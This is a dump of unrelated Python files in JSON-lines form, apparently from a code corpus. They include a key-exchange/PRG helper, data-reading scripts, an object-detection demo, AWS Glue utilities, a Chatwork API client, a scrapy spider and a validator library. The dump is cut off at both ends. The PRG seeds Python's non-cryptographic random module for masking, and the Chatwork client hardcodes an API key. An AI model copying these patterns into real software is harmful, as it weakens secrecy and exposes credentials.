party_i:\n common_key_raw, _ = nb.crypto_kx_client_session_keys(my_pkey_list[i], my_skey_list[i], other_pkey_list[i])\n else: \n _, common_key_raw = nb.crypto_kx_server_session_keys(my_pkey_list[i], my_skey_list[i], other_pkey_list[i])\n #Hash the common keys\n common_key = int.from_bytes(nb.crypto_hash_sha256(common_key_raw), byteorder='big')\n common_key_list.append(common_key)\n return common_key_list\n\n\n#PRG\n\ndef randomize( r, modulo, clientsign):\n # Call the double lenght pseudorsndom generator\n random.seed(r)\n rand = random.getrandbits(256*2)\n rand_b_raw = bin(rand)\n nr_zeros_append = 256 - (len(rand_b_raw) - 2)\n rand_b = '0' * nr_zeros_append + rand_b_raw[2:]\n # Use first half to mask the inputs and second half as the next seed to the pseudorsndom generator\n R = int(rand_b[0:256], 2)\n r = int(rand_b[256:] , 2)\n return r, R \n\n\ndef randomize_all(party_i, common_key_list, modulo):\n \n for i in range(len(common_key_list)):\n if i == party_i:\n continue\n clientsign = 1 if i > party_i else -1\n common_key_list[i], client = randomize( common_key_list[i], modulo, clientsign)\n \n return common_key_list, client","sub_path":"src/utils/diffie_hellman.py","file_name":"diffie_hellman.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"494320647","text":"import csv\n\ngas=[]\ndata_e=[\"value\",\"country_or_area\"]\nyear=\"2010\"\nwith open(\"greenhouse_gas_inventory_data_data.csv\") as csvFile:\n reader1 =csv.reader(csvFile)\n for row in reader1:\n if row[2] not in data_e and row[1] in year: \n gas.append([float(row[-2]), row[0]])\n gas.sort(reverse=True)\n\nprint(gas[:5])\n\n\n\n\npop=[]\nv=[\"--\",\"NA\"]\nco_e=[\"World\",\"Country\",\"Asia & Oceania\",\"Africa\",\"Europe\",\"Central & South America\", \"North America\",\"Eurasia\",\"Middle East\"]\n\n\nwith open(\"populationbycountry19802010millions.csv\") as csvFile:\n reader =csv.reader(csvFile)\n for row in reader:\n if row[-1] not in v and row[0] not in co_e:\n pop.append([float(row[-1]), row[0]])\n \n pop.sort(reverse=True)\n\n print(pop[:5])\n\n\n\n\n\n\n","sub_path":"fileReader.py","file_name":"fileReader.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403649824","text":"#!/usr/bin/env python3\n\n# ------\n# Sum.py\n# ------\n\nfrom functools import reduce\nfrom operator import add\n\nimport sys\nimport time\n\ndef sum_while (a) :\n i = 0\n s = 0\n while i != len(a) :\n s += a[i]\n i += 1\n return s\n\ndef sum_for_range (a) :\n s = 0\n for i in range(len(a)) :\n s += a[i]\n return s\n\ndef sum_while_iter (a) :\n p = iter(a)\n s = 0\n try :\n while True :\n s += next(p)\n except StopIteration :\n pass\n return s\n\ndef sum_for_in (a) :\n s = 0\n for w in a :\n s += w\n return s\n\ndef sum_reduce_lambda (a) :\n return reduce(lambda x, y : x + y, a, 0)\n\ndef sum_reduce_operator (a) :\n return reduce(add, a, 0)\n\ndef test_1 (f, c) :\n assert f(c()) == 0\n assert f(c([2])) == 2\n assert f(c([2, 3])) == 5\n assert f(c([2, 3, 4])) == 9\n\ndef test_2 (f) :\n print(f.__name__)\n a = 500 * [1]\n b = time.clock()\n assert f(a) == 500\n e = time.clock()\n print(\"%5.3f\" % ((e - b) * 1000), \"milliseconds\")\n print()\n\nprint(\"Sum.py\")\nprint(sys.version)\nprint()\n\ntest_1(sum_while, list)\ntest_1(sum_while, tuple)\n#test_1(sum_while, set) # TypeError: 'set' object does not support indexing\n\ntest_1(sum_for_range, list)\ntest_1(sum_for_range, tuple)\n#test_1(sum_for_range, set) # TypeError: 'set' object does not support indexing\n\ntest_1(sum_while_iter, list)\ntest_1(sum_while_iter, tuple)\ntest_1(sum_while_iter, set)\n\ntest_1(sum_for_in, list)\ntest_1(sum_for_in, tuple)\ntest_1(sum_for_in, set)\n\ntest_1(sum_reduce_lambda, list)\ntest_1(sum_reduce_lambda, tuple)\ntest_1(sum_reduce_lambda, set)\n\ntest_1(sum_reduce_operator, list)\ntest_1(sum_reduce_operator, tuple)\ntest_1(sum_reduce_operator, set)\n\ntest_1(sum, list )\ntest_1(sum, tuple)\ntest_1(sum, set)\n\ntest_2(sum_while)\ntest_2(sum_for_range)\ntest_2(sum_while_iter,)\ntest_2(sum_for_in)\ntest_2(sum_reduce_lambda)\ntest_2(sum_reduce_operator)\ntest_2(sum)\n\nprint(\"Done.\")\n\n\"\"\"\nSum.py\n3.3.3 (default, Jan 19 2014, 09:53:07)\n[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.2.79)]\n\nsum_while\n0.206 milliseconds\n\nsum_for_range\n0.085 milliseconds\n\nsum_while_iter\n0.126 milliseconds\n\nsum_for_in\n0.053 milliseconds\n\nsum_reduce_lambda\n0.134 milliseconds\n\nsum_reduce_operator\n0.068 milliseconds\n\nsum\n0.013 milliseconds\n\nDone.\n\"\"\"\n","sub_path":"examples/Sum.py","file_name":"Sum.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"351660684","text":"import cv2\nimport os\nimport tensorflow as tf\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\nmodel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'models/ssd_mobilenet_v11_coco',\n 'frozen_inference_graph.pb')\nimages_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'images/')\nlabel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'inference/ssd_mobilenet_v11_coco',\n 'label_map.pbtxt')\nnum_classes = 10\n\n\ndef get_images_list(path):\n return [f for f in listdir(path) if isfile(join(path, f))]\n\n\nif __name__ == \"__main__\":\n\n images = get_images_list(images_dir)\n\n detection_graph = tf.Graph()\n with detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(model_path, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n label_map = label_map_util.load_labelmap(label_path)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=num_classes,\n use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n\n with tf.Session(graph=detection_graph) as sess:\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n\n for image_name in images:\n image = cv2.imread(images_dir + image_name)\n\n image_np = np.expand_dims(image, axis=0)\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np})\n image_np = np.squeeze(image_np, axis=0)\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n\n cv2.imshow('object_detection', image)\n # Exit Option\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n","sub_path":"image_test_network.py","file_name":"image_test_network.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367917083","text":"import collections\nimport json\nimport boto3\nimport tempfile\nimport zipfile\nimport shutil\nimport string\nimport os\nimport subprocess\n\n_glue_client = boto3.client('glue', 'eu-west-1')\n_s3_client = boto3.client('s3')\n_s3_resource = boto3.resource('s3')\n\ndef _get_git_revision_hash():\n return subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('utf-8').replace('\\n','')\n\ndef _get_git_revision_short_hash():\n return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).decode('utf-8').replace('\\n','')\n\n\n# https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\ndef _dict_merge(dct, merge_dct):\n \"\"\" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of\n updating only top-level keys, dict_merge recurses down into dicts nested\n to an arbitrary depth, updating keys. The ``merge_dct`` is merged into\n ``dct``.\n :param dct: dict onto which the merge is executed\n :param merge_dct: dct merged into dct\n :return: None\n \"\"\"\n for k, v in merge_dct.items():\n if (k in dct and isinstance(dct[k], dict)\n and isinstance(merge_dct[k], collections.Mapping)):\n _dict_merge(dct[k], merge_dct[k])\n else:\n dct[k] = merge_dct[k]\n\n# Read json file\ndef read_json(filename) :\n with open(filename) as json_data:\n data = json.load(json_data)\n return data\n\n# Write json file\ndef write_json(data, filename) :\n with open(filename, 'w+') as outfile:\n json.dump(data, outfile, indent=4, separators=(',', ': '))\n\ndef _end_with_slash(string) :\n if string[-1] != '/' :\n return string + '/'\n else :\n return string\n\ndef _remove_final_slash(string) :\n if string[-1] == '/' :\n return string[:-1]\n else:\n return string\n\n# Used by both classes (Should move into another module)\ndef _validate_string(s, allowed_chars = \"_\") :\n if s != s.lower() :\n raise ValueError(\"string provided must be lowercase\")\n\n invalid_chars = string.punctuation\n\n for a in allowed_chars :\n invalid_chars = invalid_chars.replace(a, \"\")\n\n if any(char in invalid_chars for char in s) :\n raise ValueError(\"punctuation excluding ({}) is not allowed in string\".format(allowed_chars))\n\ndef _get_file_from_file_path(file_path) :\n return file_path.split('/')[-1]\n\ndef _unnest_github_zipfile_and_return_new_zip_path(zip_path):\n \"\"\"\n When we download a zipball from github like this one:\n https://github.com/moj-analytical-services/gluejobutils/archive/master.zip\n\n The python lib is nested in the directory like:\n gluejobutils-master/gluejobutils/py files\n\n The glue docs say that it will only work without this nesting:\n docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-libraries.html\n\n This function creates a new, unnested zip file, and returns the path to it\n\n \"\"\"\n\n original_file_name = os.path.basename(zip_path)\n original_dir = os.path.dirname(zip_path)\n new_file_name = original_file_name.replace(\".zip\", \"_new\")\n\n with tempfile.TemporaryDirectory() as td:\n myzip = zipfile.ZipFile(zip_path, 'r')\n myzip.extractall(td)\n nested_folder_to_unnest = os.listdir(td)[0]\n nested_path = os.path.join(td, nested_folder_to_unnest)\n output_path = os.path.join(original_dir, new_file_name)\n final_output_path = shutil.make_archive(output_path, 'zip', nested_path)\n\n return final_output_path\n","sub_path":"etl_manager/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85425437","text":"#for loops\r\n#\r\n# l1 = [\"jack\", \"jill\", \"mark\", \"paul\"]\r\n#\r\n# for name in l1:\r\n# print(name)\r\n\r\n\r\n# l1 = [[\"jack\", 1], [\"jill\", 2], [\"mark\", 7], [\"paul\", 9]]\r\n#\r\n# for name, wife in l1:\r\n# print(name, \"number of wives\", wife)\r\n#\r\n# d1 = dict(l1)\r\n# for name in d1:\r\n# print(name)\r\n# for name, wives in d1.items():\r\n# print(name, \"number of wives\", wives)\r\n\r\nl1 = [1, 2, \"jack\", \"jill\", 7, 11]\r\n\r\nfor item in l1:\r\n if str(item).isnumeric() and item > 6:\r\n print(item)\r\n\r\n\r\n","sub_path":"tut12.py","file_name":"tut12.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143856140","text":"#!/bin/python\n# Maze Escape Player, by Matthew Schieber\n# complete player, which employs the \"keep right hand on wall\" strategy\n# template for use on hackerrank.com/challenges/maze-escape\n\n\ndef move_me(board):\n \n m = len(board)\n n = len(board[0])\n posr = 1\n posc = 1\n \n # go to exit\n target = False\n for i in range(m):\n for j in range(n):\n if(board[i][j] == 'e'):\n target = True\n goal_x, goal_y = i, j\n \n if(target): \n if(posr > goal_x):\n print (\"UP\")\n elif(posr < goal_x):\n print (\"DOWN\")\n elif(posc > goal_y):\n print (\"LEFT\")\n elif(posc < goal_y):\n print (\"RIGHT\")\n\n else:\n #: #\n #: - b\n if(board[0][1] == \"#\" and board[1][0] == \"-\"):\n print (\"LEFT\")\n \n #: \n #: # b\n #: - \n elif(board[1][0] == \"#\" and board[2][1] == '-'):\n print (\"DOWN\")\n \n #: -\n #: b #\n #: \n elif(board[0][1] == '-' and board[1][2] == '#'):\n print (\"UP\")\n \n #: \n #: b -\n #: # \n elif(board[1][2] == '-'):\n print (\"RIGHT\")\n \n elif(board[1][0] == '-'):\n print (\"LEFT\")\n \n \n \n# Tail starts here\nif __name__ == \"__main__\":\n pos = [int(i) for i in input().strip().split()]\n board = [[j for j in input().strip()] for i in range(3)]\n move_me(board)\n","sub_path":"maze-escape/player_complete.py","file_name":"player_complete.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"404314042","text":"\"\"\"\nThis module is made to create validators in the field\n\"\"\"\nimport re\nimport warnings\nfrom datetime import datetime\nEmailRegex = r'[^@]+@[^@]+\\.[^@]+'\nUrlRegex = (\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$')\nurl_regex = re.compile(UrlRegex, re.IGNORECASE)\nemail_reg = re.compile(EmailRegex, re.IGNORECASE)\n\ntry:\n from email_validator import validate_email,EmailNotValidError\nexcept ImportError as e:\n warnings.warn(\"Email Validator is not found\"\n \"Please install it using\"\n \"pip3 install email_validator\")\n def validate_email(email):\n if not email_reg.match(email):\n raise Invalid(\"Email is Not Valid\")\n\nclass Invalid(ValueError):\n \"\"\"\n This Exception is General Exception used to raise when Data is invalid,\n Not a valid Type etc.\n\n :param message: Message you want to print in error\n :param args: any\n :param kwargs: any\n :type message: str\n \"\"\"\n def __init__(self, message, *args, **kwargs):\n super(Invalid, self).__init__(message, *args, **kwargs)\n\n\nclass Validator(object):\n \"\"\"\n This is core of each validator class\n\n :param message: Message to be raised when any invalidation occours\n :type message: str\n \"\"\"\n\n def __init__(self, message=None):\n \"\"\"\n This is The basic Validator\n\n :param message: The message you want to get in template engine\n \"\"\"\n if message is not None:\n self.message = message\n\nclass Data(Validator):\n\n \"\"\"\n This is Data field to check that weather data\n is provided or not\n\n :param message: Message to be raised when any invalidation occours\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"This is called with object and field\n of object\n\n Args:\n obj (dir): directory of enclosing field\n field : element of object\n\n Raises:\n Invalid: if data is not provided\n \"\"\"\n data = field.data\n if isinstance(data, str) or isinstance(data, int) or isinstance(data, float):\n self.data = str(field.data)\n if not self.data.strip():\n raise Invalid(\"data is not valid\")\n if isinstance(data, list) or isinstance(data, dict):\n self.data = field.data\n if not self.data:\n Invalid(\"data is not valid\")\n \n\nclass Length(Validator):\n \"\"\"\n This validator is used to check the minimum and maximum Length of data\n This will work with str, int , float not with array length\n\n :param min_val: minimum length\n :param max_val: maximum length\n :param message: Message to be raised when any invalidation occours\n :type message: str\n :type min_val: int\n :type max_val: int\n \"\"\"\n def __init__(self, min_val=-1, max_val=-1, message=None):\n \"\"\"Overriding Validator Base class\n \"\"\"\n super(Length,self).__init__(message)\n if min_val == -1 and max_val == -1:\n raise ValueError('At least Provide one of minimum or minimum Value')\n else:\n self.min_val = min_val\n self.max_val = max_val\n\n def __call__(self, obj, field):\n self.data = field.data\n if (isinstance(self.data, (str, int, float))):\n self.data = str(self.data).strip()\n else:\n raise Invalid(\"Not a Valid Type\")\n if (len(self.data) < self.min_val or \n self.max_val!=-1 and len(self.data) > self.max_val):\n raise Invalid(\"Length is not appopriate\")\n\n\nclass Email(Validator):\n\n \"\"\"\n The Email Validator is used to validate Email which use dependency of python\n email_validator to validate email if not installed on machiene it will used\n standard regex to validate email\n\n :param message: Message to be raised when any invalidation occours\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"Call when used to validate this field\n\n Args:\n obj (dir): An object containing Validator\n field (dir): field of object\n \"\"\"\n self.data = field.data\n try:\n validate_email(self.data)\n except EmailNotValidError:\n raise Invalid(str(self.data) + \"is not valid\")\n\n\nclass URL(Validator):\n \"\"\"\n The url validator is used to validate url's But it dones not instanciate\n from Regex class here this is another implementation\n\n :param message: Message to be raised when any invalidation occours\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"A Class to validate urls\n\n Args:\n obj (object): A dir congaing Validator\n field (obj): field of object\n \"\"\"\n self.data = field.data\n if not url_regex.match(self.data):\n raise Invalid(\"Not a valid url\")\n\n\nclass EqualTo(Validator):\n \"\"\"\n The EqualTo Validator is used to check if data in our field is\n same as other field\n\n :param field: Other field Pass the whole Field\n :param message: Message to be raised when any invalidation occours\n :type message: str\n :type field: Field class\n \"\"\"\n\n def __init__(self, field, message=None):\n super(EqualTo,self).__init__(message)\n self.other = field\n\n def __call__(self, obj, field):\n if hasattr(self.other, \"_data\"):\n other_data = self.other.data\n else:\n self.other(obj)\n other_data = self.other.data\n self.data = field.data\n if self.data != other_data:\n raise Invalid(\"Unequal Data\")\n\n\nclass Date(Validator):\n \"\"\"\n The date field validator is used to validate date field\n under specific range of min_date and max_date\n\n :param min_date: minimum date\n :param max_date: maximum date\n :param field_format: format of field\n :param message: message\n :type min_date: str of year-month-date\n :type max_date: str of year-month-date\n :type field_format: Field format %Y-%M-%d is default\n :type message: str\n \"\"\"\n\n def __init__(self, min_date= datetime.min, max_date= datetime.min,field_format=None, message=None ):\n \"\"\"\n Overiding Init\n \"\"\"\n if field_format is None:\n self.field_format = \"%Y-%M-%d\"\n else:\n self.field_format = field_format\n super(Date, self).__init__(message)\n if min_date == datetime.min and max_date == datetime.min:\n raise ValueError(\"Provide one of min_date or max_dat\")\n else:\n self.min_date = self.givedatetime(self.field_format, min_date)\n self.max_date = self.givedatetime(self.field_format, max_date)\n\n def __call__(self, obj, field):\n \"\"\"\n call the validator just with object containing\n field and the field object\n\n :param obj: object containing field\n :param field: some field object which instantiate Field\n which is callable and raises Invalid error\n when validated\n :return:None\n \"\"\"\n self.data = field.data\n try:\n self.date = datetime.strptime(self.data, self.field_format)\n except ValueError as e:\n raise Invalid(e)\n\n if (self.date < self.min_date or\n self.max_date != datetime.min and self.date >= self.max_date):\n raise Invalid(\"date is not bounded\")\n\n @staticmethod\n def givedatetime(dateformat, date):\n if isinstance(date, datetime):\n return date\n try:\n dt = datetime.strptime(date, dateformat)\n return dt\n except ValueError as e:\n raise Invalid(\"cannot Get currect format of date\"\n \"in setting value of datetime at\")\n\n\nclass Regex(Validator):\n \"\"\"\n This is used to validate data in format of regex\n\n :param regex: regex\n :param message: Message to be raised when Error occours\n :type message: str\n :type regex: str\n \"\"\"\n\n def __init__(self, reg, message=None):\n \"\"\"\n This is regex class used to validate some field\n on regex implementation\n it will not raise invalidation when regex matches\n fields data\n \n Args:\n reg (regex): Regex\n message (message, optional): Message you want on Error\n \"\"\"\n super(Regex,self).__init__(message)\n self.regex = re.compile(reg)\n\n def __call__(self, obj, field):\n self.data = field.data\n if not self.regex.match(self.data):\n raise Invalid(\"it does not match The valid Pattern\")\n \nclass Right(Validator):\n \"\"\"\n This Validator is specific to boolean Field which validates that\n data is True only\n\n :param message: message to be raise when error occours\n :type message: str\n \"\"\"\n def __call__(self,obj,field):\n self.data = field.data\n if not isinstance(self.data, bool):\n raise Invalid(\"this field should contain\"\n \"only boolean type values\")\n\n if not self.data:\n raise Invalid(\"field is false\")\n\nclass Wrong(Validator):\n \"\"\"\n This Validator is specific to boolean Field which validates that\n data is False only\n\n :param message: message to be raise when error occours\n :type message: str\n \"\"\"\n\n def __call__(self,obj,field):\n self.data = field.data\n if not isinstance(self.data, bool):\n raise Invalid(\"this field should contain\"\n \"only boolean type values\")\n\n if self.data:\n raise Invalid(\"field is false\")","sub_path":"json_justify/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"105770162","text":"import urllib.request\nimport json\nimport pprint\n\n# APIのエンドポイント\nENDPOINT = \"https://api.chatwork.com/v2\"\n\n# APIキー\napikey = \"e1531a1547f378ae47ceb94c4a1ad151\"\n\n# ChatworkのAPIをコールする関数\n# @params path(必須): APIのパス\n# @params data(任意): 送信するデータ\ndef api (path, data=None):\n # 送信データがある場合にはURLエンコードする\n if data != None:\n data = urllib.parse.urlencode(data)\n data = data.encode('utf-8')\n # APIキーをヘッダーに付与する\n headers = {\"X-ChatWorkToken\": apikey}\n # リクエストの生成と送信\n req = urllib.request.Request(ENDPOINT + path, data=data, headers=headers)\n with urllib.request.urlopen(req) as res:\n # API結果\n result = json.loads(res.read().decode(\"utf-8\"))\n # レスポンスヘッダ(残利用可能数などが入っている)\n info = dict(res.info())\n return result, info\n\nif __name__ == '__main__':\n # Get My Status.\n mystatus, info = api(\"/my/status\")\n print(json.dumps(mystatus, indent=4))","sub_path":"ソース/get_mystatus.py","file_name":"get_mystatus.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150209404","text":"import sys\r\nimport matplotlib.pyplot as plt\r\n\r\nsys.path.append('D:\\\\Analyses\\\\Long-Lived-pymc3\\\\TreeNob1875XDate')\r\nfrom GetParamStats import GetParamValues,GetNames\r\nfrom RunningQuantiles import pltRunningQuantile\r\nsys.path.append( '../') \r\nsys.path.append( '../../') \r\n\r\n\r\nfrom HistoByHalf import HistoByHalf\r\nCaseName='..\\\\NormRecruit.csv'\r\n\r\nnthin=1000\r\nburn=0\r\n\r\npname=GetNames(CaseName)\r\n\r\n\r\nfor p in pname:\r\n x=GetParamValues(CaseName, p,burn=burn,nthin=nthin)\r\n print (p,len(x))\r\n plt.close()\r\n HistoByHalf(plt,x, ParamName=p,LowCol='r',UppCol='b',alpha=0.25)\r\n if p[:7]=='Rel_Abu':\r\n plt.xlim(-.05,1.05)\r\n plt.xlabel('Number of Iterations')\r\n plt.ylabel('Confidence Bounds')\r\n fname='trace_'+p+'.png'\r\n plt.savefig(fname, format=\"png\")\r\n\r\n","sub_path":"ConstRecruitConstM/DemoConverge/Traces_NormRecruit.py","file_name":"Traces_NormRecruit.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"82576996","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup as bs\nimport re\nfrom espn.items import MatchItem\n\n\nclass FixtureSpider(scrapy.Spider):\n name = \"fixture\"\n allowed_domains = [\"espnfc.com\"]\n #start_urls = (\n #'http://www.espnfc.com/',\n #)\n\n season = 2015\n FIXTURE_URL = \"http://www.espnfc.com/{type}/{name_en}/{id}/fixtures?leagueId=0&season={season}\"\n team_pat = re.compile(\"teamlogos/soccer/\\d+/(\\d+).png\")\n\n def start_requests(self):\n import dataset\n SERVER = self.settings.get(\"SERVER\")\n if SERVER:\n db = dataset.connect(SERVER)\n teams = db.query(\"select id, name_en, type from yt_team\")\n for team in teams:\n team[\"name_en\"] = team[\"name_en\"].encode(\"utf-8\")\n url = self.FIXTURE_URL.format(season=self.season, **team)\n yield scrapy.Request(url,\n meta={\"team\": team})\n\n def parse(self, response):\n for item in self.parse_fixture(response):\n yield item\n team = response.meta[\"team\"]\n seasons = response.xpath(\".//*[@id='club-season-dropdown']/select/option/@value\").extract()\n for season in seasons:\n url = self.FIXTURE_URL.format(season=season, **team)\n yield scrapy.Request(url,\n meta={\"team\": team})\n\n def parse_fixture(self, response):\n #team = response.meta[\"team\"]\n response = bs(response.body, [\"lxml\"])\n fixtures = response.find_all(\"a\", attrs={\"class\": \"score-list\"})\n for fixture in fixtures:\n espn_id = fixture.get(\"data-gameid\")\n date = fixture.find(\"div\", attrs={\"class\": \"headline\"}).text\n finish = fixture.find(\"div\", attrs={\"class\": \"status\"})\n if not finish:\n finish = 2\n else:\n finish = finish.text\n\n home_logo = fixture.find(\"div\", attrs={\"class\": \"score-home-team\"}).find(\"img\")\n matched = self.team_pat.search(home_logo.get(\"src\"))\n if matched:\n home_id = matched.group(1)\n else:\n home_id = home_logo.get(\"alt\")\n\n result = fixture.find(\"div\", attrs={\"class\": \"result\"})\n home_score = result.find(\"span\", attrs={\"class\": \"home-score\"}).text\n away_score = result.find(\"span\", attrs={\"class\": \"away-score\"}).text\n\n away_logo = fixture.find(\"div\", attrs={\"class\": \"score-away-team\"}).find(\"img\")\n matched = self.team_pat.search(away_logo.get(\"src\"))\n if matched:\n away_id = matched.group(1)\n else:\n away_id = away_logo.get(\"alt\")\n\n league_id = fixture.find(\"div\", attrs={\"class\": \"score-competition\"}).get(\"title\")\n\n match = MatchItem(home_id=home_id,\n away_id=away_id,\n date=date,\n league_id=league_id,\n home_score=home_score,\n away_score=away_score,\n finish=finish,\n espn_id=espn_id)\n yield match\n\n","sub_path":"espn/spiders/fixture.py","file_name":"fixture.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"298177793","text":"import xlwt\nimport xlrd\n\n# 用来获取本地 文件名\ndef file_name(file_dir):\n import os\n L = []\n for root, dirs, files in os.walk(file_dir):\n # print(root) #当前目录路径\n # print(dirs) #当前路径下所有子目录\n L.append(files) #当前路径下所有非目录子文件\n return L[0]\n\n# 得到表中所有文件名\ndef get_cars_name(path):\n car_info = xlrd.open_workbook(path)\n # 通过sheet索引获得sheet对象\n sheet0 = car_info.sheet_by_index(0)\n result = sheet0.col_values(0)[1:]\n return result\n\ndef filter(all_path, find_path):\n car_info = xlrd.open_workbook(all_path)\n # 通过sheet索引获得sheet对象\n sheet0 = car_info.sheet_by_index(0)\n count = sheet0.nrows\n find_cars = file_name(find_path)\n L = []\n for item in find_cars:\n item = item.split(\"_\")[0]\n L.append(item)\n\n # 创建新表\n new_car_info = xlwt.Workbook(encoding='utf-8', style_compression=0)\n # 写入新表\n sheet1 = new_car_info.add_sheet('车辆二次分析', cell_overwrite_ok=True)\n sheet1.write(0, 0, \"车牌\")\n sheet1.write(0, 1, \"时间\")\n sheet1.write(0, 2, \"车道编号\")\n sheet1.write(0, 3, \"方向\")\n for i in range(1, count):\n car = sheet0.row_values(i)[0]\n # print(car)\n if car in L:\n print(\"有: \" + car)\n sheet1.write(i, 0, sheet0.row_values(i)[0])\n sheet1.write(i, 1, sheet0.row_values(i)[1])\n sheet1.write(i, 2, sheet0.row_values(i)[2])\n sheet1.write(i, 3, sheet0.row_values(i)[3])\n sheet1.write(i, 4, sheet0.row_values(i)[4])\n\n else:\n print(\"NO\")\n new_car_info.save(r\"C:\\Users\\lsy\\Desktop\\kc\\fliter.xls\")\n\n\nall_path = r\"C:\\Users\\lsy\\Desktop\\kc\\pic.xls\"\nfind_path = r\"C:\\Users\\lsy\\Desktop\\kc\\pic\"\n\nall_cars = get_cars_name(all_path)\nfilter(all_path, find_path)\n\n","sub_path":"python/filter_excle.py","file_name":"filter_excle.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"369934367","text":"import os, random, shutil\n# from shutil import copyfile\nfrom IPython import embed\n\n# You only need to change this line to your dataset download path\nsrc_path = '../train'\n\nif not os.path.isdir(src_path):\n print('please change the src_path')\n\ndst_ds_path = './datasets/pclreid'\nif not os.path.isdir(dst_ds_path):\n os.mkdir(dst_ds_path)\n\n#---------------------------------------\n#train\ntrain_save_path = dst_ds_path + '/train'\nif not os.path.isdir(train_save_path):\n os.mkdir(train_save_path)\n\nfile_handle = open(src_path + \"/label.txt\", \"r\") \nlines = file_handle.readlines()\nfile_handle.close()\n\nprint(\"There are {} lines in label.txt. Is that 72824?\".format(len(lines)))\n\nc = 0\n\nfor line in lines:\n line = line.strip() # to erase blank\n line = line.strip('\\n') # to erase \\n\n line_list = line.split(':')\n \n src_img_filename = line_list[0]\n cls_name = line_list[1] \n \n src_file_path = src_path + '/images/' + src_img_filename\n\n dst_filename = cls_name + '_c' + str(random.randint(1,99)) + 's1_' + src_img_filename\n # dst_filename = cls_name + '_c1s1_' + src_img_filename\n dst_file_path = train_save_path + '/' + dst_filename\n \n shutil.move(src_file_path, dst_file_path)\n \n c += 1\n if c % 10000 == 0:\n print('{} files copied.'.format(c)) \n\nprint('train dataset completed. {} files copied.'.format(c))\n\n\n","sub_path":"tools/prepare_train-data.py","file_name":"prepare_train-data.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490483366","text":"from datetime import datetime\nfrom pystac.extensions.eo import Band, SummariesEOExtension\nfrom pystac.extensions.projection import SummariesProjectionExtension\n\nfrom pystac import (Catalog, Collection, Extent, Link, Provider, SpatialExtent,\n TemporalExtent, Summaries)\n\nspot_sensor = {\"S4\": \"SPOT 4\", \"S5\": \"SPOT 5\"}\n\nimage_types = {\n \"m20_1\": \"B1\",\n \"m20_2\": \"B2\",\n \"m20_3\": \"B3\",\n \"m20_4\": \"B4\",\n \"p10_1\": 